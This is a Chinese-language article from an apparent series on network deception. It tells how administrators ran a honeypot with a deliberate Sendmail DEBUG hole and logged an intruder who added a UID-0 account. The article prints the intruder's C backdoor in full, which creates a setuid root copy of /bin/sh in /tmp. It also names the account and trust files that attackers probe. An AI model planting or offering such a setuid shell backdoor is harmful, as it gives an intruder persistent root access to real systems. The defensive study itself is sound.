实例讲解：网络欺骗的方法以及攻防!（4）

　　Sendmail 主要的配置文件如下:

　　/etc/sendmail.cf是Sendmail 核心配置文件;

　　/etc/aliases是邮件别名文件;

　　/etc/mail/relay-domains用于设定可RELAY的域名;

　　/etc/mail/access用来设定处理来信的方式如RELAY等;

　　在默认情况下，也就是安装Sendmail服务器不做任何设置的情况下，则只能在本机上收发邮件，网络上其它主机不能向该SMTP服务器发送邮件。关于Sendmail的具体安装配置过程，我们可以通过http://www.worldhello.net/doc/email_howto/sendmail.html这个网址得到比较满意的答案。

　　2、序幕

　　为了给黑客们一个惊喜，我们故意留出了一个DUBUG漏洞，张开网后，就等鱼儿上钩了。大概一个多月都没有动静，终于，在我们无意中间接公布了一些系统的消息后，发现系统出了异常的日志是在2004年2月14日，可能是由于情人节的落寞想找个地方来发泄，一个黑客发现了我们公布的计算机的漏洞，试图获得我们的password文件，顺水推舟，我们就给他送了一份人情，很快我们就发现在口令文件 passwd 中增加了一个 UID 为 0 的账号。

　　这个黑客十分有耐心，手段也很高明。一切在意料之中，我们在机器的/tmp目录下又发现了一个程序，而且只要运行这个程序，就会轻易得到用户权限。根据我们自己掌握的情况，这种方法在网上几乎是最受欢迎的了。不过，对于系统用户来说，定期清理/tmp下的文件是很正常的，因此即使我们清理这个文件，他也不会感到意外。我们打开在 /tmp 目录下放置 的C源程序进行了研究:

<++> backdoor/backdoor2.c #include  main() { system("cp /bin/sh /tmp/fid"); system("chown root.root /tmp/fid"); system("chmod 4755 /tmp/fid"); } <-->

　　很明显，这是一个后门程序，通过这个程序可以获得一些关于根用户的相关属性，这对黑客来说是一个刺激，对我们管理员来说，既然要“诱敌深入”做个测试，就肯定也存在一定挑战了。而现在我们所要做的，就是引诱一个黑客到一个我们设计好的环境中，记录下来他的所有动作，研究其行为，并提醒他的下一个目标作出防范。除了在机器上设置记录日志并隐藏这些日志，我们还添加了一些虚假的服务在系统上。由于每天定时产生的日志量非常大，为了有针对地了解攻击动向，我们做了一个script文件用来检索每天的日志。其中，我们主要检查以下几点:

　　Telnet/login服务检查:如果有黑客试图进入我们的系统，他肯定要尝试很多帐户和密码，这样他的一举一动都会被我们记录下来。当然，由于试探的人比较多，五花八门三教九流，水平太次的人我们是不会给他机会的。然后就是探测Guest / visitor 账号，黑客们第一个寻找的就是公用账号。这些账号提供了友好的、最轻易地获取几乎系统的所有文件的机会，包括passwd文件。黑客也可以通过获取/etc/hosts.equiv文件或每个用户的.rhosts文件来获得机器的信任主机列表。